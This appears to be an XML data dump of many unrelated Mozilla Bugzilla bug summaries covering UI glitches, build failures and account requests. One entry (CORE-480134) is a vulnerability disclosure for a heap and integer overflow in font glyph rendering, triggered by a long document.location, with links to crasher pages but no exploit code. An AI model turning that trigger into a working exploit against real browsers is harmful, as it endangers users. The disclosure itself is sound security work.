    <t>We need to make a Sparkle option for our use for whether or not to show the CFBundleVersion when a CFBundleShortVersionString has been specified so that we don't have the freaky-looking version string in the update panel.
Since the whole point of CFBundleShortVersionString is to hide a non-user-friendly version string I'll aim for defaulting it to *not* showing both.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-499485</t>
  </si>
  <si>
    <t>Sothink Video Downloader 5.2 violates the GPL and breaks FlashGot 1.9.4.4</t>
  </si>
  <si>
    <t>The closed sourced Sothink Video Downloader extension incorporates an older version of the FlashGot service verbatim (in violation of the GPL) overwriting the original service and therefore breaking newer FlashGot versions.
Since the breakage happened after the last FlashGot upgrade which contained incompatible changes and couldn't rely on the cloned service I received many complaints about latest FlashGot version disappearing and had a hard time tracing back the real issue.
http://forums.informaction.com/viewtopic.php?p=6378#p6378</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-362029</t>
  </si>
  <si>
    <t>MillBar Toolbar does not state collection of user data</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
https://addons.mozilla.org/firefox/2432/
MillBar Toolbar does not explicitly state that it collects user data as requested by AMO Extension Policy.
Reproducible: Always</t>
  </si>
  <si>
    <t>dongato</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-461044</t>
  </si>
  <si>
    <t>Sisyphus - add support for fennec</t>
  </si>
  <si>
    <t>Created attachment 344181
sisyphus patch</t>
  </si>
  <si>
    <t>FIREFOX-449832</t>
  </si>
  <si>
    <t>Color mismatch between unified toolbar and selected tab after bug 439354</t>
  </si>
  <si>
    <t>In bug 439354 I've changed the unified toolbar to be drawn by a -moz-appearance and I've made the colors  darker to match those of native Cocoa applications.
Now the selected tab's color is too light - when the bookmarks bar is hidden there's a color mismatch.
And there's another problem: When color management is turned on the tab images are color-corrected but the unified toolbar is not.
These problems can be solved by using a platform color for the tab's color. Platform colors aren't color-corrected. I'll file a bug for creating the platform colors -moz-mac-chrome-active and -moz-mac-chrome-inactive soon.
This platform color will be set as the background color for the tabs.
Then the tab images need to be changed to be transparent so that the platform color shines through in the right places.
Finally a trick must be applied to ensure that the tab's shadow is still transparent (and not filled with the platform color) in order to get nice-looking tab drag images (see also bug 408294). I'll solve that with border-radius and negative margins.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-505802</t>
  </si>
  <si>
    <t>Stage Socorro webapp-php deployment (webcode only)</t>
  </si>
  <si>
    <t>Please svn up on webapp-php for stage. This contains a couple fixes for yesterday's release.
xhtml validation removing MTBF from menu updating dashboard's top crash by url to use Fx 3.5.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-520418</t>
  </si>
  <si>
    <t>build break due to empty short DLL names</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.1.4pre) Gecko/20090925 SeaMonkey/2.0pre
Build Identifier: 
When building trunk the build attempts to build .dll with .def and fails with libraries that are 8 chars or less
Reproducible: Always
Steps to Reproduce:
1.Pull trunk
2.make -f client.mk
3.
Actual Results:  
the build dies with abspath trying to locate .def
Expected Results:  
DLL's to be built</t>
  </si>
  <si>
    <t>dave.r.yeo</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-373968</t>
  </si>
  <si>
    <t>Add PRD Change Request component</t>
  </si>
  <si>
    <t>As part of developing a change-control system for the PRD (and PRDs in the future) we would like to have a PRD Change Request component in Bugzilla so we can properly track requests.  Under Documentation would be sufficient since it is a product documentation issue.  Thanks.</t>
  </si>
  <si>
    <t>THUNDERBIRD-227014</t>
  </si>
  <si>
    <t>No progress dialog when right click save as on an attachment</t>
  </si>
  <si>
    <t>If you double click the attachment and click save as from the helper app dialog
we bring up a progress dialog.
If you go through the attachment's context menu and save as directly we don't
us the progress UI.</t>
  </si>
  <si>
    <t>CORE-255411</t>
  </si>
  <si>
    <t>Use my colors preference makes popup/hover frames have transparent background</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040803
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040803
Color settings:
* Browser: green-on-black
* Windows XP Appearance: yellow-on-blue
When the Use my chosen colors preference is enabled hover popups
(e.g. email address in Gmail while hovering over the sender's name) and dropdown
lists created using popups (e.g. Move To... dropdown on Yahoo Mail) are
created with a *transparent* background -- not the black background color I've
chosen. This makes them barely readable over the content they cover.
Reproducible: Always
Steps to Reproduce:
1. Set background color preference to some non-standard color (e.g. black).
2. Enable Use my chosen colors preference on same preference page.
3. View a site with a hover/popup (e.g. popup navigation menus).
Actual Results:  
The popup has a transparent background making it difficult to read.
Expected Results:  
The popup has the background color selected in Preferences : Appearance :
Colors. No underlying content from the main page should show through.</t>
  </si>
  <si>
    <t>dharkness</t>
  </si>
  <si>
    <t>CORE-480134</t>
  </si>
  <si>
    <t>Heap/integer overflows during font glyph rendering reachable in FF and Camino (libpango CoreGraphics)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Both Firefox and Camino are exposed to a font rendering integer overflow which exists independently in libpango and in Apple's CoreGraphics (ripc).
I have reported the bug upstream to Apple but they have no timeline to fix. (Yes this affects Safari too..)
The issue is in URL bar rendering.  If a very long document.location is set via javascript the integer overflow is reachable.  The files at the above location show this bug for each.  
The affected code in pango is in pango_glyph_string_set_size:
An overflow check when doubling the size neglects the overflow possible on the subsequent allocation:
  string-&gt;glyphs = g_realloc (string-&gt;glyphs string-&gt;space * sizeof (PangoGlyphInfo))
I don't have a live exploit but this looks exploitable.  I have not yet gotten this reported upstream to libpango.  It is pending on their mailing list and I've received no response.
Because of their delay and Apple's delay I thought it would make the most sense to put a maximum limit on the document.location.
This will be referenced with advisory oCERT-2009-001.
Reproducible: Always
Steps to Reproduce:
1. Goto a pango crasher in http://static.dataspill.org/glyph/
   E.g. http://static.dataspill.org/glyph/pango_2.html
2. Crash.
Depending on how the overflow is handled you can get it to proceed without a crash.
(Note I've been tinkering with the crashers so there's nothing special about the different versions just a few tweaks.)
Actual Results:  
In camino it is often a NULL deref.  I can get a few other random stack-addresses visible but I haven't done a thorough analysis on the Apple libraries to know.
In ff pango exposes the num_glyphs after a successful underallocation.  If this is used for writing to the glyph array it will result in heap corruption.
Expected Results:  
Maximum URL length and/or integer overflow checks in libpango/ripc would stop this.
Please let me know if I can help coordinate anything.  I can be reached at my personal address: redpig@dataspill.org or at my oCERT addr: redpig@ocert.org.
I will be pursuing getting this upstream to pango but if you have any contacts that can help that'd be great.
In addition if you have some idea for Camino fixes if you plan to release the crashers please let me know in advance.  I would like to negotiate some embargo date with Apple if possible but who knows.</t>
  </si>
  <si>
    <t>redpig</t>
  </si>
  <si>
    <t>CORE-10693</t>
  </si>
  <si>
    <t>incorrect ID leads to no interface generation</t>
  </si>
  <si>
    <t>If you use an invalid IID in the interface properties line no class declaration
is generated and there is no warning.
[scriptable uuid(77772C3A2-452A-11d3-9AE1-B085B4B41855)] &lt;= note extra digit
interface jtIIDContainer : nsISupports {
    attribute nsIDPtr containedID
}
generates (with xpidl -m header -I c:\mozilla\xpcom\base jtIIDContainer.idl)
/*
 * DO NOT EDIT.  THIS FILE IS GENERATED FROM jtIIDContainer.idl
 */
#ifndef __gen_jtIIDContainer_h__
#define __gen_jtIIDContainer_h__
#include nsISupports.h
#include nsrootidl.h
/* starting interface:    jtIIDContainer */
ONLY!
but removing the leading 7 from the ID results in the expected header.</t>
  </si>
  <si>
    <t>jtsay</t>
  </si>
  <si>
    <t>CORE-63357</t>
  </si>
  <si>
    <t>xpcom/io/nsIFileStream.h should be removed</t>
  </si>
  <si>
    <t>nsIFileStream.h contains some stream-related stuff that is duplicated in the 
header generated from netwerk/base/public/nsIFileStreams.h. e.g. they both have 
#define NS_IFILEINPUTSTREAM_IID
defining this to a different IID! This is build and runtime bustage waiting to 
happen.</t>
  </si>
  <si>
    <t>CORE-199108</t>
  </si>
  <si>
    <t>Changes to cookie prefs need restart to take effect</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.4a) Gecko/2003032416
Build Identifier: Mozilla/5.0 (Windows U Windows 98 de-DE rv:1.4a) Gecko/2003032416
After making changes to cookie behaviour (Enable cookies disable cookies ask
before storing a.s.o) in ui I need to leave the browser and start it again to
take the changes effect.
E.g. changing from Enable all cookies to Disable cookies and leaving prefs
via ok changes nothing: cookies will be set further on.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA.ORG-91397</t>
  </si>
  <si>
    <t>Creating a new CVS account for Rajiv Dayal</t>
  </si>
  <si>
    <t>I have an approved (reviewed super-reviewed) bug # 83585 to add a new feature 
to the mailnews component for importing 4.x address book. I need to check-in the 
approved changes to mozilla trunk. Need a new account with write access for it.
thanks
- rajiv.</t>
  </si>
  <si>
    <t>rdayal</t>
  </si>
  <si>
    <t>CORE-445705</t>
  </si>
  <si>
    <t>SM: eliminate Namespace and QName GC things</t>
  </si>
  <si>
    <t>Currently Namespace and QName are implemented as separated GC things that gain an JSObject when exposed to a script. But this separated object complicates code due to the need to manage the pair (gc_thing object) instead of single entity.
Thus to simplify code I suggest to use JSObject for Namespace and QName and store all the necessary fields from Namespace and QName in the fixed slots of the object. In a common case when there are only few namespaces that are accessed from a script this will in fact save memory avoiding allocating a separated GC thing.</t>
  </si>
  <si>
    <t>CORE-107518</t>
  </si>
  <si>
    <t>M17rc1 xul Scrollbar within scrollbox causes crash [@ nsViewManager::UpdateView ][@ nsView::GetDimensions]</t>
  </si>
  <si>
    <t>I do not know if this bug depends on bug 77716 . Just in case I report this - 
see testcase</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-511178</t>
  </si>
  <si>
    <t>creating a new file at the root of a project displays leading forward-slash</t>
  </si>
  <si>
    <t>- open a file in a project at the root level
- open the command line
- execute newfile somenewfile.txt
- the ui displays [project] - /somenewfile.txt
- open the command line (if you closed it)
- execute save
- open the file browser
- open somenewfile.txt through the file browser
- the ui displays [project] - somenewfile.txt without the leading slash</t>
  </si>
  <si>
    <t>MOZILLA.ORG-322792</t>
  </si>
  <si>
    <t>change brantgurganus2001@cherokeescouting.org to brantgurga@gmail.com</t>
  </si>
  <si>
    <t>I no longer have access to brantgurganus2001@cherokeescouting.org so could it be changed to brantgurga@gmail.com?</t>
  </si>
  <si>
    <t>CORE-418494</t>
  </si>
  <si>
    <t>tell image rendering to use SOURCE instead of OVER</t>
  </si>
  <si>
    <t>Created attachment 304308
use OPERATOR_SOURCE when possible
Image rendering can use the SOURCE operator instead of OVER in a bunch of cases let's do that.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-180144</t>
  </si>
  <si>
    <t>Filter editing UI: filter conditions group can fail to have a scroll bar if sized too small - so it seems unable to have multiple criteria rules are missing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021114
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021114
When editing a filter the box that contains the conditions for the filter can
be missing a scroll bar if your dialog is sized small enough vertically.
Reproducible: Always
Steps to Reproduce:
1. Edit a message filter
2. Resize your window vertically so that you can only see part of the text of
the condition to match
3. Click on the More button to add another filter condition
Actual Results:  
If you've sized your window small enough even though another condition was
added no scroll bar will be visible.  If you resize your window now you can
get the scrollbar to appear - mine did when the first pixel of the condition box
for the second condition appeared.
I'm using the classic theme on a nightly I downloaded this morning.  This caused
me a bit of confusion initially as my window was sized perfectly to trigger the
bug I thought the additional conditions were not being added.</t>
  </si>
  <si>
    <t>todd.pederzani</t>
  </si>
  <si>
    <t>THUNDERBIRD-428887</t>
  </si>
  <si>
    <t>accounts not listed in account order under the Get Mail button</t>
  </si>
  <si>
    <t>The accounts are no longer listed in account order under Get Mail. They now seem to be in some random order instead. (Also some non-existent news accounts are listed.)
Regression window 2008-04-10 03 -&gt; 2008-04-10 03 so I suspect bug 413781.</t>
  </si>
  <si>
    <t>BUGZILLA-233400</t>
  </si>
  <si>
    <t>The 3rd-party integration section should point to Bugzilla:Addons on wiki</t>
  </si>
  <si>
    <t>4.6.1: How is Bonsai relevant to integration with Bugzilla?  It doesn't say.
4.6.2: CVS integration stuff...  should mention Dave Swegen's project?
4.6.4: Tinderbox is a continuous-build system which can integrate with
Bugzilla.  It can?  how?  I don't know of anything in Tinderbox which
references Bugzilla or vice versa...  I'd be really happy to be enlightened :)</t>
  </si>
  <si>
    <t>CORE-420415</t>
  </si>
  <si>
    <t xml:space="preserve">Crash while quitting with dialog from </t>
  </si>
  <si>
    <t>About 10% of the time this assertion failure occurs just before the dialog appears:
###!!! ASSERTION: painting in the middle of frame construction: 'mPresContext-&gt;mLayoutPhaseCount[eLayoutPhase_FrameC] == 0' file ../../dist/include/layout/nsPresContext.h line 931
If I click OK in the dialog nothing bad happens.  But if I press Cmd+Q while the dialog is up there is a 60% chance of crashing regardless of whether the assertion failure occurred.  The crash dereferences 0xdddddde9.</t>
  </si>
  <si>
    <t>TOOLKIT-299282</t>
  </si>
  <si>
    <t>Package updater executable and updater.ini files with installer builds</t>
  </si>
  <si>
    <t>Package updater executable and updater.ini files with installer builds
 .ini belongs in the @AB_CD@ package
 and .exe belongs in the browser package</t>
  </si>
  <si>
    <t>FIREFOX-250716</t>
  </si>
  <si>
    <t>More improvements to in-browser notifications</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-121711</t>
  </si>
  <si>
    <t>waa.at - Blank page if  tags are within  tags</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:0.9.7) Gecko/20011222
BuildID:    2001122123
The URL given above gives a blank page. Although it's clear that  tag
shouldn't be within the  tag Mozilla should try better to display the
page. The page displays right in IE5/6 and Communicator 4.xx.
Reproducible: Always
Steps to Reproduce:
1.Load http://www.waa.at/bericht/2001/06_sofiexp/index_e.html
You'll experience a white page.
Actual Results:  You'll experience a white page.
Expected Results:  See a webpage consisting of two frames.</t>
  </si>
  <si>
    <t>mozilla2012</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-205084</t>
  </si>
  <si>
    <t>GRE doesn't work in mfcEmbed</t>
  </si>
  <si>
    <t>CORE-323311</t>
  </si>
  <si>
    <t>[FIX] Create an nsINode interface</t>
  </si>
  <si>
    <t>Sicking and I have been talking about this on and off.  So I finally did it.
What I need to do now is to run the XSLT and DOM test suites in this build.  Directions on how to do that would be much appreciated.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-121042</t>
  </si>
  <si>
    <t>lycos.com - Various display problems</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:0.9.4)
Gecko/20011128 Netscape6/6.2.1
BuildID:    2002011908
Using Mozilla buildID:2002011908 version 0.9.7+ with the 2002 home updated
version of Windows XP  I wanted to read the story about the Packers and the Rams
but there is a problem which not only causes content to break up but also align
very poorly. It also looks like some Style sheet problems.  
Using the JAVAscript console the following errors appeared
Error: formatDate is not defined
Source File: http://foxsports.lycos.com/content/view?contentId=184411
Line: 200
Error: ie4 is not defined
Source File: http://foxsports.lycos.com/content/view?contentId=184411
Line: 213
Error: ie4 is not defined
Source File: http://foxsports.lycos.com/content/view?contentId=184411
Line: 257
Error: ns4 is not defined
Source File: http://foxsports.lycos.com/content/view?contentId=184411
Line: 262
Reproducible: Always
Steps to Reproduce:
1. View the story here http://foxsports.lycos.com/content/view?contentId=285106</t>
  </si>
  <si>
    <t>WEBSITES-523105</t>
  </si>
  <si>
    <t>please change planet feed</t>
  </si>
  <si>
    <t>Hi - since I will be traveling an blogging a lot more personal stuff I would like to limit my contribution to planet to mozilla related info. Could you thus change the feed to the sub category: 
http://bblop.wordpress.com/category/mozilla/
Thanks
Barbara</t>
  </si>
  <si>
    <t>bhueppe</t>
  </si>
  <si>
    <t>WEBSITES-484421</t>
  </si>
  <si>
    <t>New blog posted to planet</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3
Build Identifier: 
Tag should be: Nicole Loux
Reproducible: Always</t>
  </si>
  <si>
    <t>nloux</t>
  </si>
  <si>
    <t>FIREFOX-357222</t>
  </si>
  <si>
    <t>nsLivemarkService.js checks feeds to often</t>
  </si>
  <si>
    <t>This should be 1hr not 1/2hr.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-345525</t>
  </si>
  <si>
    <t>Plan Firefox 2.0 Release Parties</t>
  </si>
  <si>
    <t>Firefox 2 is coming and a party is required. The release schedule/dates are available at http://wiki.mozilla.org/Firefox2/Schedule</t>
  </si>
  <si>
    <t>CALENDAR-282580</t>
  </si>
  <si>
    <t>Calendar HTML Export functionality missing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20050110 Firefox/1.0 (Debian package 1.0+dfsg.1-2)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20050110 Firefox/1.0 (Debian package 1.0+dfsg.1-2)
It should be very to export to HTML: simply save a dump of the HTML which is
already being generated by Calendar: instead of rendering it in Gecko save it to a
file... 
Ideally the output would be split among several pages (one per month) linked
by means of REL=prev / REL=next tags.
Of Course the period to export should be selectable and there should be a
button  available to select *all events* in the calendar with one click. This
way exporting a whole Calendar would be a matter of five clicks at most (start
Export Wizard select HTML output format select all events option select
output file click Finish)
[sorry too busy with many other OSS projects to devote time to yet another one :-S]
Reproducible: Always
Steps to Reproduce:
(Command not available)
Actual Results:  
(None)
Expected Results:  
Produce HTML output
Even though ICS can be shared over HTTP for users who do not have ICS clients
it is very important that we can publish Calendars in HTML format so that they
look at them from a browser.
Filed under Normal bug report as opposed to Wishlist because this feature
would really make SunBird competitive in front of the competition.</t>
  </si>
  <si>
    <t>jltallon</t>
  </si>
  <si>
    <t>CORE-499921</t>
  </si>
  <si>
    <t>add support for NPAPI NPN_ScheduleTimer/NPN_UnscheduleTimer</t>
  </si>
  <si>
    <t>We should add support for NPAPI NPN_ScheduleTimer/NPN_UnscheduleTimer. This was originally specified as part of the Cocoa NPAPI event model but it not specific to the Cocoa event model.</t>
  </si>
  <si>
    <t>FIREFOX-284206</t>
  </si>
  <si>
    <t>Clicking in open div underlines all  according to stylesheet?</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
According to the stylesheet of the website links are to be underlined on hover
and active. However when clicking within a div that uses the link stylesheet
certain text will become underlined within the div.
Reproducible: Always
Steps to Reproduce:
1. Load the site.
2. Click in one of the divs that has that link style definition such as entry body.
Actual Results:  
Some or all text in div became underlined.
Expected Results:  
Nothing should have happened (Unless it was a link etc.).</t>
  </si>
  <si>
    <t>rfludwick</t>
  </si>
  <si>
    <t>CORE-161250</t>
  </si>
  <si>
    <t>whitespaces negative in front of links or italic text</t>
  </si>
  <si>
    <t>Some of the white spaces in front of links or italic text became negative: one
character over each other</t>
  </si>
  <si>
    <t>sieboerg</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-218635</t>
  </si>
  <si>
    <t>http://www.mozilla.org/start/1.0/opensource.html - bad link to 'Cathedral And The Bazaar'</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.5b) Gecko/20030902 Firebird/0.6.1+
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.5b) Gecko/20030902 Firebird/0.6.1+
* The Cathedral and the Bazaar by Eric S. Raymond â€“ why the open source process
results in better software.
The link is to http://www.tuxedo.org/~esr/writings/cathedral-bazaar/ which no
longer links to the book. The correct URL on ESR's pages is now:
http://www.catb.org/~esr/writings/cathedral-bazaar/
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-958995</t>
  </si>
  <si>
    <t>Android x86 tests fail with Can't download from http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip</t>
  </si>
  <si>
    <t>I think this must be related to the tegra move:
https://tbpl.mozilla.org/php/getParsedLog.php?id=32896068&amp;tree=Cedar&amp;full=1
13:43:37     INFO - Downloading http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip to /builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip
13:43:37     INFO - retry: Calling &gt; with args: ('http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip' '/builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip') kwargs: {} attempt #1
13:44:07  WARNING - URL Error: http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip
13:44:07     INFO - Running command: ['nslookup' 'bm-remote.build.mozilla.org']
13:44:07     INFO - Copy/paste: nslookup bm-remote.build.mozilla.org
13:44:07     INFO -  Server:		10.26.75.40
13:44:07     INFO -  Address:	10.26.75.40#53
13:44:07     INFO -  bm-remote.build.mozilla.org	canonical name = bm-remote.tegra.releng.scl3.mozilla.com.
13:44:07     INFO -  Name:	bm-remote.tegra.releng.scl3.mozilla.com
13:44:07     INFO -  Address: 10.26.84.204
13:44:07     INFO - Return code: 0
13:44:07     INFO - retry: Failed sleeping 60 seconds before retrying
13:45:07     INFO - retry: Calling &gt; with args: ('http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip' '/builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip') kwargs: {} attempt #2
13:45:37  WARNING - URL Error: http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip
13:45:37     INFO - Running command: ['nslookup' 'bm-remote.build.mozilla.org']
13:45:37     INFO - Copy/paste: nslookup bm-remote.build.mozilla.org
13:45:37     INFO -  Server:		10.26.75.40
13:45:37     INFO -  Address:	10.26.75.40#53
13:45:37     INFO -  bm-remote.build.mozilla.org	canonical name = bm-remote.tegra.releng.scl3.mozilla.com.
13:45:37     INFO -  Name:	bm-remote.tegra.releng.scl3.mozilla.com
13:45:37     INFO -  Address: 10.26.84.204
13:45:37     INFO - Return code: 0
13:45:37     INFO - retry: Failed sleeping 120 seconds before retrying
13:47:37     INFO - retry: Calling &gt; with args: ('http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip' '/builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip') kwargs: {} attempt #3
13:48:07  WARNING - URL Error: http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip
13:48:07     INFO - Running command: ['nslookup' 'bm-remote.build.mozilla.org']
13:48:07     INFO - Copy/paste: nslookup bm-remote.build.mozilla.org
13:48:07     INFO -  Server:		10.26.75.40
13:48:07     INFO -  Address:	10.26.75.40#53
13:48:07     INFO -  bm-remote.build.mozilla.org	canonical name = bm-remote.tegra.releng.scl3.mozilla.com.
13:48:07     INFO -  Name:	bm-remote.tegra.releng.scl3.mozilla.com
13:48:07     INFO -  Address: 10.26.84.204
13:48:07     INFO - Return code: 0
13:48:07     INFO - retry: Failed sleeping 240 seconds before retrying
13:52:07     INFO - retry: Calling &gt; with args: ('http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip' '/builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip') kwargs: {} attempt #4
13:52:37  WARNING - URL Error: http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip
13:52:37     INFO - Running command: ['nslookup' 'bm-remote.build.mozilla.org']
13:52:37     INFO - Copy/paste: nslookup bm-remote.build.mozilla.org
13:52:37     INFO -  Server:		10.26.75.40
13:52:37     INFO -  Address:	10.26.75.40#53
13:52:37     INFO -  bm-remote.build.mozilla.org	canonical name = bm-remote.tegra.releng.scl3.mozilla.com.
13:52:37     INFO -  Name:	bm-remote.tegra.releng.scl3.mozilla.com
13:52:37     INFO -  Address: 10.26.84.204
13:52:37     INFO - Return code: 0
13:52:37     INFO - retry: Failed sleeping 300 seconds before retrying
13:57:37     INFO - retry: Calling &gt; with args: ('http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip' '/builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip') kwargs: {} attempt #5
13:58:08  WARNING - URL Error: http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip
13:58:08     INFO - Running command: ['nslookup' 'bm-remote.build.mozilla.org']
13:58:08     INFO - Copy/paste: nslookup bm-remote.build.mozilla.org
13:58:08     INFO -  Server:		10.26.75.40
13:58:08     INFO -  Address:	10.26.75.40#53
13:58:08     INFO -  bm-remote.build.mozilla.org	canonical name = bm-remote.tegra.releng.scl3.mozilla.com.
13:58:08     INFO -  Name:	bm-remote.tegra.releng.scl3.mozilla.com
13:58:08     INFO -  Address: 10.26.84.204
13:58:08     INFO - Return code: 0
13:58:08    FATAL - Can't download from http://bm-remote.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip to /builds/slave/talos-slave/test/build/tegra-host-utils.Linux.742597.zip!
13:58:08    FATAL - Caught exception: 
13:58:08    FATAL - Caught exception: 
13:58:08    FATAL - Caught exception: 
13:58:08    FATAL - Caught exception: 
13:58:08    FATAL - Caught exception: 
13:58:08    FATAL - Running post_fatal callback...</t>
  </si>
  <si>
    <t>BUGZILLA-182083</t>
  </si>
  <si>
    <t>Add documentation links to many pages in Bugzilla</t>
  </si>
  <si>
    <t>Currently the new help system only supports search.html.tmpl. It should support
more pages. To add help to a new page you need to:
- Create a file similar to template/en/default/search/search-help.html.tmpl
which defines the ids (which actually correspond to the name attributes of form
elements) and help text for each form element on the page in question. 
- Add a link to that page that reloads it with &amp;help=1.
It's that easy.
I anticipate that this will be a tracking bug.
Gerv</t>
  </si>
  <si>
    <t>CORE-46077</t>
  </si>
  <si>
    <t>Tooltips look ugly also tooltip code invalid</t>
  </si>
  <si>
    <t>Tooltips look ugly cf. MSIE. MSIE's which are smaller and neater look much
more professional. They are also wrong on every platform because they do not
correspond to system values.
Here's the classic code:
.tooltip
  {
    background-color      : infobackground
    border                : 1px solid windowframe
    color                 : infotext
    font                  : smaller
    padding               : 0px 1px 0px 2px
  }
.tooltip &gt; .popup-internal-box
  {
  	border: 0px
  	padding: 0px
  }
modern:
.tooltip
  {
    background-color      : #FFFFCC
    border                : 1px outset #FFFFCC
    color                 : #000000
    font                  : smaller
    padding               : 3px
  }
There are the following problems:
The padding is too big and looks ugly.
All other applications use UI settings there is potential for conflict
(invisible tooltips) and for tooltips that look inappropraite for the system.
Hence change in each case background color and font to UI values.
Border needs to be 1px solid black regardless of settings (this is what happens
in other applications).
Font: smaller is invalid - the font shorthand requires both size and family
(e.g. font: smaller sans-serif) hence Mozilla is currently ignoring it.
However the correct thing to do is to use UI settings anyway.
Here's the new code (both skins):
.tooltip
  {
    background-color      : infobackground
    border                : 1px solid black
    color                 : infotext
    font             	  : info
    padding               : 1px 2px
  }</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-433983</t>
  </si>
  <si>
    <t>qm-pvista-trunk01/qm-pvista-trunk03 needs a reboot.</t>
  </si>
  <si>
    <t>I sort of accidentally shut it down.  
They put the reboot button right beside the shutdown button!  How can I be blamed for their poor UI?</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375034</t>
  </si>
  <si>
    <t>Kodak Gallery extension recommended yet in the sandbox</t>
  </si>
  <si>
    <t>MoCo's Kodak extension is listed among the recommended add-ons but isn't public so attempting to view it gives users get a lovely 'Add-on not found!' message and a redirect right back to the front page.</t>
  </si>
  <si>
    <t>BUGZILLA-311572</t>
  </si>
  <si>
    <t>describecomponents.cgi requires login</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
https://bugzilla.mozilla.org/describecomponents.cgi requires a login but it's
linked to from https://bugzilla.mozilla.org/query.cgi?format=advanced as the
description for the components. Since query.cgi does not require a login
describecomponents.cgi shouldn't require a login either.
Reproducible: Always
Steps to Reproduce:
1.Log out
2.Open the URL
Actual Results:  
The login screen appears.
Expected Results:  
Gone ahead without having to login.
Since I'm not sure this is specific to bugzilla.mozilla.org I'm reporting on
the Bugzilla product as requested.</t>
  </si>
  <si>
    <t>SEAMONKEY-220768</t>
  </si>
  <si>
    <t>Warning: assignment to undeclared variable gDefaultSpecialFolderPickerMode</t>
  </si>
  <si>
    <t>Setup a new Mail account (POP3 was the type that exhibited this):
Warning: assignment to undeclared variable gDefaultSpecialFolderPickerMode
Source File: chrome://messenger/content/AccountWizard.js
Line: 87
